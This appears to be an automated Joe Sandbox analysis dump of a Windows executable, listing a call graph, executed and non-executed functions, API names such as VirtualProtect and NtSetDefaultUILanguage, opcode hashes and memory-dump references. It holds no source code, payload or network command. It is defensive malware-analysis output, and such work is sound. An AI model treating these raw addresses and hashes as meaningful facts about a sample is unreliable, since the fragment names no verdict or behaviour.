4334 7ff7ee4a149a 4333->4334 4335 7ff7ee4a1394 2 API calls 4334->4335 4336 7ff7ee4a14a9 4335->4336 4337 7ff7ee4a1394 2 API calls 4336->4337 4338 7ff7ee4a14b8 4337->4338 4339 7ff7ee4a1394 2 API calls 4338->4339 4340 7ff7ee4a14c7 4339->4340 4341 7ff7ee4a1394 2 API calls 4340->4341 4342 7ff7ee4a14d6 4341->4342 4343 7ff7ee4a14e5 4342->4343 4344 7ff7ee4a1394 2 API calls 4342->4344 4345 7ff7ee4a1394 2 API calls 4343->4345 4344->4343 4346 7ff7ee4a14ef 4345->4346 4347 7ff7ee4a14f4 4346->4347 4348 7ff7ee4a1394 2 API calls 4346->4348 4349 7ff7ee4a1394 2 API calls 4347->4349 4348->4347 4350 7ff7ee4a14fe 4349->4350 4351 7ff7ee4a1394 2 API calls 4350->4351 4352 7ff7ee4a1503 4351->4352 4353 7ff7ee4a1512 4352->4353 4354 7ff7ee4a1394 2 API calls 4352->4354 4355 7ff7ee4a1394 2 API calls 4353->4355 4354->4353 4356 7ff7ee4a1521 4355->4356 4357 7ff7ee4a1394 2 API calls 4356->4357 4358 7ff7ee4a152b 4357->4358 4359 7ff7ee4a1530 4358->4359 4360 7ff7ee4a1394 2 API calls 4358->4360 4361 7ff7ee4a1394 2 API calls 4359->4361 4360->4359 4362 7ff7ee4a153a 4361->4362 4363 7ff7ee4a153f 4362->4363 4364 7ff7ee4a1394 2 API calls 4362->4364 4365 7ff7ee4a1394 2 API calls 4363->4365 4364->4363 4366 7ff7ee4a154e 4365->4366 4367 7ff7ee4a1394 2 API calls 4366->4367 4368 7ff7ee4a1558 4367->4368 4369 7ff7ee4a155d 4368->4369 4370 7ff7ee4a1394 2 API calls 4368->4370 4371 7ff7ee4a1394 2 API calls 4369->4371 4370->4369 4372 7ff7ee4a1567 4371->4372 4373 7ff7ee4a156c 4372->4373 4374 7ff7ee4a1394 2 API calls 4372->4374 4375 7ff7ee4a1394 2 API calls 4373->4375 4374->4373 4376 7ff7ee4a1576 4375->4376 4377 7ff7ee4a157b 4376->4377 4378 7ff7ee4a1394 2 API calls 4376->4378 4379 7ff7ee4a1394 2 API calls 4377->4379 4378->4377 4380 7ff7ee4a1585 4379->4380 4381 7ff7ee4a158a 4380->4381 4382 7ff7ee4a1394 2 API calls 4380->4382 4383 7ff7ee4a1394 2 API calls 4381->4383 4382->4381 4384 7ff7ee4a1599 4383->4384 4385 7ff7ee4a1394 2 API calls 4384->4385 4386 7ff7ee4a15a3 4385->4386 4387 7ff7ee4a1394 2 API calls 4386->4387 4388 7ff7ee4a15a8 4387->4388 4389 7ff7ee4a1394 2 API calls 4388->4389 4390 7ff7ee4a15b7 4389->4390 4391 7ff7ee4a1394 2 API calls 4390->4391 4392 7ff7ee4a15c6 4391->4392 4393 7ff7ee4a1394 2 API calls 4392->4393 4394 7ff7ee4a15d5 4393->4394 4395 7ff7ee4a15e4 4394->4395 4396 7ff7ee4a1394 2 API calls 4394->4396 4397 7ff7ee4a1394 2 API calls 4395->4397 4396->4395 4398 7ff7ee4a15f3 4397->4398 4398->3778 4398->3782 4400 7ff7ee4a1394 2 API calls 4399->4400 4401 7ff7ee4a1486 4400->4401 4402 7ff7ee4a148b 4401->4402 4403 7ff7ee4a1394 2 API calls 4401->4403 4404 7ff7ee4a1394 2 API calls 4402->4404 4403->4402 4405 7ff7ee4a1495 4404->4405 4406 7ff7ee4a1394 2 API calls 4405->4406 4407 7ff7ee4a149a 4406->4407 4408 7ff7ee4a1394 2 API calls 4407->4408 4409 7ff7ee4a14a9 4408->4409 4410 7ff7ee4a1394 2 API calls 4409->4410 4411 7ff7ee4a14b8 4410->4411 4412 7ff7ee4a1394 2 API calls 4411->4412 4413 7ff7ee4a14c7 4412->4413 4414 7ff7ee4a1394 2 API calls 4413->4414 4415 7ff7ee4a14d6 4414->4415 4416 7ff7ee4a14e5 4415->4416 4417 7ff7ee4a1394 2 API calls 4415->4417 4418 7ff7ee4a1394 2 API calls 4416->4418 4417->4416 4419 7ff7ee4a14ef 4418->4419 4420 7ff7ee4a14f4 4419->4420 4421 7ff7ee4a1394 2 API calls 4419->4421 4422 7ff7ee4a1394 2 API calls 4420->4422 4421->4420 4423 7ff7ee4a14fe 4422->4423 4424 7ff7ee4a1394 2 API calls 4423->4424 4425 7ff7ee4a1503 4424->4425 4426 7ff7ee4a1512 4425->4426 4427 7ff7ee4a1394 2 API calls 4425->4427 4428 7ff7ee4a1394 2 API calls 4426->4428 4427->4426 4429 7ff7ee4a1521 4428->4429 4430 7ff7ee4a1394 2 API calls 4429->4430 4431 7ff7ee4a152b 4430->4431 4432 7ff7ee4a1530 4431->4432 4433 7ff7ee4a1394 2 API calls 4431->4433 4434 7ff7ee4a1394 2 API calls 4432->4434 4433->4432 4435 7ff7ee4a153a 4434->4435 4436 7ff7ee4a153f 4435->4436 4437 7ff7ee4a1394 2 API calls 4435->4437 4438 7ff7ee4a1394 2 API calls 4436->4438 4437->4436 4439 7ff7ee4a154e 4438->4439 4440 7ff7ee4a1394 2 API calls 4439->4440 4441 7ff7ee4a1558 4440->4441 4442 7ff7ee4a155d 4441->4442 4443 7ff7ee4a1394 2 API calls 4441->4443 4444 7ff7ee4a1394 2 API calls 4442->4444 4443->4442 4445 7ff7ee4a1567 4444->4445 4446 7ff7ee4a156c 4445->4446 4447 7ff7ee4a1394 2 API calls 4445->4447 4448 7ff7ee4a1394 2 API calls 4446->4448 4447->4446 4449 7ff7ee4a1576 4448->4449 4450 7ff7ee4a157b 4449->4450 4451 7ff7ee4a1394 2 API calls 4449->4451 4452 7ff7ee4a1394 2 API calls 4450->4452 4451->4450 4453 7ff7ee4a1585 4452->4453 4454 7ff7ee4a158a 4453->4454 4455 7ff7ee4a1394 2 API calls 4453->4455 4456 7ff7ee4a1394 2 API calls 4454->4456 4455->4454 4457 7ff7ee4a1599 4456->4457 4458 7ff7ee4a1394 2 API calls 4457->4458 4459 7ff7ee4a15a3 4458->4459 4460 7ff7ee4a1394 2 API calls 4459->4460 4461 7ff7ee4a15a8 4460->4461 4462 7ff7ee4a1394 2 API calls 4461->4462 4463 7ff7ee4a15b7 4462->4463 4464 7ff7ee4a1394 2 API calls 4463->4464 4465 7ff7ee4a15c6 4464->4465 4466 7ff7ee4a1394 2 API calls 4465->4466 4467 7ff7ee4a15d5 4466->4467 4468 7ff7ee4a15e4 4467->4468 4469 7ff7ee4a1394 2 API calls 4467->4469 4470 7ff7ee4a1394 2 API calls 4468->4470 4469->4468 4471 7ff7ee4a15f3 4470->4471 4471->3787 4473 7ff7ee4a1394 2 API calls 4472->4473 4474 7ff7ee4a15d5 4473->4474 4475 7ff7ee4a15e4 4474->4475 4476 7ff7ee4a1394 2 API calls 4474->4476 4477 7ff7ee4a1394 2 API calls 4475->4477 4476->4475 4478 7ff7ee4a15f3 4477->4478 4478->3768 4516 7ff7ee4a1000 4517 7ff7ee4a108b __set_app_type 4516->4517 4518 7ff7ee4a1040 4516->4518 4520 7ff7ee4a10b6 4517->4520 4518->4517 4519 7ff7ee4a10e5 4520->4519 4522 7ff7ee4a1e00 4520->4522 4523 7ff7ee4a7cf0 __setusermatherr 4522->4523 4524 7ff7ee4a1800 4525 7ff7ee4a1812 4524->4525 4526 7ff7ee4a1835 fprintf 4525->4526 4544 7ff7ee4a2320 strlen 4545 7ff7ee4a2337 4544->4545 4527 7ff7ee4a2104 4528 7ff7ee4a2111 EnterCriticalSection 4527->4528 4529 7ff7ee4a2218 4527->4529 4531 7ff7ee4a220b LeaveCriticalSection 4528->4531 4535 7ff7ee4a212e 4528->4535 4530 7ff7ee4a2272 4529->4530 4532 7ff7ee4a2241 DeleteCriticalSection 4529->4532 4534 7ff7ee4a2230 free 4529->4534 4531->4529 4532->4530 4533 7ff7ee4a214d TlsGetValue GetLastError 4533->4535 4534->4532 4534->4534 4535->4531 4535->4533 4575 7ff7ee4a1ac3 4577 7ff7ee4a1a70 4575->4577 4576 7ff7ee4a199e 4580 7ff7ee4a1a0f 4576->4580 4582 7ff7ee4a19e9 VirtualProtect 4576->4582 4577->4576 4578 7ff7ee4a1b36 4577->4578 4581 7ff7ee4a1b53 4577->4581 4579 7ff7ee4a1ba0 4 API calls 4578->4579 4579->4581 4582->4576 4502 7ff7ee4a1e65 4503 7ff7ee4a1e67 signal 4502->4503 4504 7ff7ee4a1e7c 4503->4504 4505 7ff7ee4a1e99 4503->4505 4504->4505 4506 7ff7ee4a1e82 signal 4504->4506 4506->4505 4546 7ff7ee4a219e 4547 7ff7ee4a2272 4546->4547 4548 7ff7ee4a21ab EnterCriticalSection 4546->4548 4549 7ff7ee4a2265 LeaveCriticalSection 4548->4549 4551 7ff7ee4a21c8 4548->4551 4549->4547 4550 7ff7ee4a21e9 TlsGetValue GetLastError 4550->4551 4551->4549 4551->4550

                                                                                            Executed Functions

                                                                                            Function 00007FF7EE4A1160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2643109117-0
                                                                                            • Opcode ID: 2b53ccf195520873a2e917af6671c9f2e66b4ccc906881f89422d3245024f0a5
                                                                                            • Instruction ID: 7b8259355a5a406de27bb65495f8aebc3a40c42174183ccbda4f16f9cca2b8ca
                                                                                            • Opcode Fuzzy Hash: 2b53ccf195520873a2e917af6671c9f2e66b4ccc906881f89422d3245024f0a5
                                                                                            • Instruction Fuzzy Hash: 755139B5E0964380E710BB15E954379A7A1EF4E7A0FC65C33E90D473A1FEBCA4598322
                                                                                            Function 00007FF7EE4A1394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • NtSetDefaultUILanguage.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE4A1156), ref: 00007FF7EE4A13F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
                                                                                            Similarity
                                                                                            • API ID: DefaultLanguage
                                                                                            • String ID:
                                                                                            • API String ID: 598056261-0
                                                                                            • Opcode ID: 12f7f34e5646d7a47c6394ab71dba81ff32d213577a609a8212d1207fc3fc457
                                                                                            • Instruction ID: 98d801d77ccbe1e19afeb01cd0d69047014488d1a3197173d57b722c219c76e0
                                                                                            • Opcode Fuzzy Hash: 12f7f34e5646d7a47c6394ab71dba81ff32d213577a609a8212d1207fc3fc457
                                                                                            • Instruction Fuzzy Hash: 95F03C3190CB4382E610EF11F84022AB3A0FB4A394F424C36F98C03724EF7CE1549B61

                                                                                            Non-executed Functions

                                                                                            Function 00007FF7EE4A3350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscatwcscpywcslen
                                                                                            • String ID: $0$0$@$@
                                                                                            • API String ID: 4263182637-1413854666
                                                                                            • Opcode ID: c0374e99f57159db9168dd41bd58a6aa1b632868761db697d436deb027a0c17b
                                                                                            • Instruction ID: a39d1cf3290a5ed68ba59ee06f6a140e1500ebdcc835baff1a7958f623707394
                                                                                            • Opcode Fuzzy Hash: c0374e99f57159db9168dd41bd58a6aa1b632868761db697d436deb027a0c17b
                                                                                            • Instruction Fuzzy Hash: 9BB1B4A190C6C285F321EB29E4053BBF7A0FF89354F811536EA8C46695EFBCD149CB16
                                                                                            Function 00007FF7EE4A2690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                                            • String ID: 0$X$`
                                                                                            • API String ID: 329590056-2527496196
                                                                                            • Opcode ID: 048c2398568d0800d11cdb0fb5f1a267ba7517e309314ff7a549fe036a4ef88d
                                                                                            • Instruction ID: 2b2b2eab87998870a538e29fe3536c4c37c6643414bd94d85fa2726db2de0fc9
                                                                                            • Opcode Fuzzy Hash: 048c2398568d0800d11cdb0fb5f1a267ba7517e309314ff7a549fe036a4ef88d
                                                                                            • Instruction Fuzzy Hash: E502C772908BC281E720DB19E4443AAB7A0FB89764F814736EA9C437E5EFBCD148C715
                                                                                            Function 00007FF7EE4A1BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • VirtualQuery.KERNEL32(?,?,?,?,00007FF7EE4A93AC,00007FF7EE4A93AC,?,?,00007FF7EE4A0000,?,00007FF7EE4A1991), ref: 00007FF7EE4A1C63
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,00007FF7EE4A93AC,00007FF7EE4A93AC,?,?,00007FF7EE4A0000,?,00007FF7EE4A1991), ref: 00007FF7EE4A1CC7
                                                                                            • memcpy.MSVCRT ref: 00007FF7EE4A1CE0
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00007FF7EE4A93AC,00007FF7EE4A93AC,?,?,00007FF7EE4A0000,?,00007FF7EE4A1991), ref: 00007FF7EE4A1D23
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                            • API String ID: 2595394609-2123141913
                                                                                            • Opcode ID: cb1764b4d40c7b3cd8d53eb81bd19f74b1d4bb87b7ad2fc799354775426d0bf5
                                                                                            • Instruction ID: e195374ccbb3d61326138bf35aeb5d867247c6b485798ae8a0d9cf1fa58b8953
                                                                                            • Opcode Fuzzy Hash: cb1764b4d40c7b3cd8d53eb81bd19f74b1d4bb87b7ad2fc799354775426d0bf5
                                                                                            • Instruction Fuzzy Hash: D74194F1A0855385FB10AB01D4447B8A750EB4ABA4FD64C33EE0D477A1EEBCE549C322
                                                                                            Function 00007FF7EE4A2104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                            • String ID:
                                                                                            • API String ID: 3326252324-0
                                                                                            • Opcode ID: 369838192b3f6a9457ac0e282590e13b5ac60ae82803ec82e43dce6996ba929d
                                                                                            • Instruction ID: 6299dd41bc2f31ae82eadf1ec467fe591a9cf756c2926c020afea752750f6f92
                                                                                            • Opcode Fuzzy Hash: 369838192b3f6a9457ac0e282590e13b5ac60ae82803ec82e43dce6996ba929d
                                                                                            • Instruction Fuzzy Hash: E321FF71E0990381F655AB11F944374A261FF4ABA0FC60833D90D477A4EFBCB85A9326
                                                                                            Function 00007FF7EE4A1E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 592 7ff7ee4a1e10-7ff7ee4a1e2d 593 7ff7ee4a1e2f-7ff7ee4a1e38 592->593 594 7ff7ee4a1e3e-7ff7ee4a1e48 592->594 593->594 595 7ff7ee4a1f60-7ff7ee4a1f69 593->595 596 7ff7ee4a1ea3-7ff7ee4a1ea8 594->596 597 7ff7ee4a1e4a-7ff7ee4a1e53 594->597 596->595 598 7ff7ee4a1eae-7ff7ee4a1eb3 596->598 599 7ff7ee4a1e55-7ff7ee4a1e60 597->599 600 7ff7ee4a1ecc-7ff7ee4a1ed1 597->600 601 7ff7ee4a1eb5-7ff7ee4a1eba 598->601 602 7ff7ee4a1efb-7ff7ee4a1f0a call 7ff7ee4a7d00 598->602 599->596 603 7ff7ee4a1f23-7ff7ee4a1f2d 600->603 604 7ff7ee4a1ed3-7ff7ee4a1ee2 signal 600->604 601->595 605 7ff7ee4a1ec0 601->605 602->603 614 7ff7ee4a1f0c-7ff7ee4a1f10 602->614 606 7ff7ee4a1f2f-7ff7ee4a1f3f 603->606 607 7ff7ee4a1f43-7ff7ee4a1f45 603->607 604->603 608 7ff7ee4a1ee4-7ff7ee4a1ee8 604->608 605->603 613 7ff7ee4a1f5a 606->613 607->595 610 7ff7ee4a1eea-7ff7ee4a1ef9 signal 608->610 611 7ff7ee4a1f4e-7ff7ee4a1f53 608->611 610->595 611->613 613->595 615 7ff7ee4a1f12-7ff7ee4a1f21 signal 614->615 616 7ff7ee4a1f55 614->616 615->595 615->603 616->613
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CCG
                                                                                            • API String ID: 0-1584390748
                                                                                            • Opcode ID: 88f5887b5313669d61e74955578d1318dfdb425a374c820e70499acdf5c62993
                                                                                            • Instruction ID: f3425ec8af2b1329c7a029891196f53a81b6d5e5985618cb53473975ac855759
                                                                                            • Opcode Fuzzy Hash: 88f5887b5313669d61e74955578d1318dfdb425a374c820e70499acdf5c62993
                                                                                            • Instruction Fuzzy Hash: 7E21EFE1E0818341FB757A14958037991819F8A774FA78D33FD1E473D4FEBCA88A8226
                                                                                            Function 00007FF7EE4A1880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 617 7ff7ee4a1880-7ff7ee4a189c 618 7ff7ee4a1a0f-7ff7ee4a1a1f 617->618 619 7ff7ee4a18a2-7ff7ee4a18f9 call 7ff7ee4a2420 call 7ff7ee4a2660 617->619 619->618 624 7ff7ee4a18ff-7ff7ee4a1910 619->624 625 7ff7ee4a1912-7ff7ee4a191c 624->625 626 7ff7ee4a193e-7ff7ee4a1941 624->626 627 7ff7ee4a191e-7ff7ee4a1929 625->627 628 7ff7ee4a194d-7ff7ee4a1954 625->628 626->628 629 7ff7ee4a1943-7ff7ee4a1947 626->629 627->628 630 7ff7ee4a192b-7ff7ee4a193a 627->630 632 7ff7ee4a1956-7ff7ee4a1961 628->632 633 7ff7ee4a199e-7ff7ee4a19a6 628->633 629->628 631 7ff7ee4a1a20-7ff7ee4a1a26 629->631 630->626 634 7ff7ee4a1b87-7ff7ee4a1b98 call 7ff7ee4a1d40 631->634 635 7ff7ee4a1a2c-7ff7ee4a1a37 631->635 637 7ff7ee4a1970-7ff7ee4a199c call 7ff7ee4a1ba0 632->637 633->618 636 7ff7ee4a19a8-7ff7ee4a19c1 633->636 635->633 638 7ff7ee4a1a3d-7ff7ee4a1a5f 635->638 639 7ff7ee4a19df-7ff7ee4a19e7 636->639 637->633 642 7ff7ee4a1a7d-7ff7ee4a1a97 638->642 643 7ff7ee4a19d0-7ff7ee4a19dd 639->643 644 7ff7ee4a19e9-7ff7ee4a1a0d VirtualProtect 639->644 647 7ff7ee4a1b74-7ff7ee4a1b82 call 7ff7ee4a1d40 642->647 648 7ff7ee4a1a9d-7ff7ee4a1afa 642->648 643->618 643->639 644->643 647->634 654 7ff7ee4a1b22-7ff7ee4a1b26 648->654 655 7ff7ee4a1afc-7ff7ee4a1b0e 648->655 658 7ff7ee4a1a70-7ff7ee4a1a77 654->658 659 7ff7ee4a1b2c-7ff7ee4a1b30 654->659 656 7ff7ee4a1b10-7ff7ee4a1b20 655->656 657 7ff7ee4a1b5c-7ff7ee4a1b6c 655->657 656->654 656->657 657->647 661 7ff7ee4a1b6f call 7ff7ee4a1d40 657->661 658->633 658->642 659->658 660 7ff7ee4a1b36-7ff7ee4a1b57 call 7ff7ee4a1ba0 659->660 660->657 661->647
                                                                                            APIs
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE4A1247), ref: 00007FF7EE4A19F9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                            • API String ID: 544645111-395989641
                                                                                            • Opcode ID: 93bdf84029d068f56074ddd8b9ba6012cff20265fe349589ca7ebf28d2f061c0
                                                                                            • Instruction ID: 02565b26e50bcf4ba55d22782204a51f7694cdd46376f7668e2458db73d4077c
                                                                                            • Opcode Fuzzy Hash: 93bdf84029d068f56074ddd8b9ba6012cff20265fe349589ca7ebf28d2f061c0
                                                                                            • Instruction Fuzzy Hash: CF51B5A1F04543C6EB10AB11D8447B4A761EB1A7B4F864D33E91C07794EEBCE49AC722
                                                                                            Function 00007FF7EE4A1800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 665 7ff7ee4a1800-7ff7ee4a1810 666 7ff7ee4a1812-7ff7ee4a1822 665->666 667 7ff7ee4a1824 665->667 668 7ff7ee4a182b-7ff7ee4a1867 call 7ff7ee4a2290 fprintf 666->668 667->668
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmpDownload File
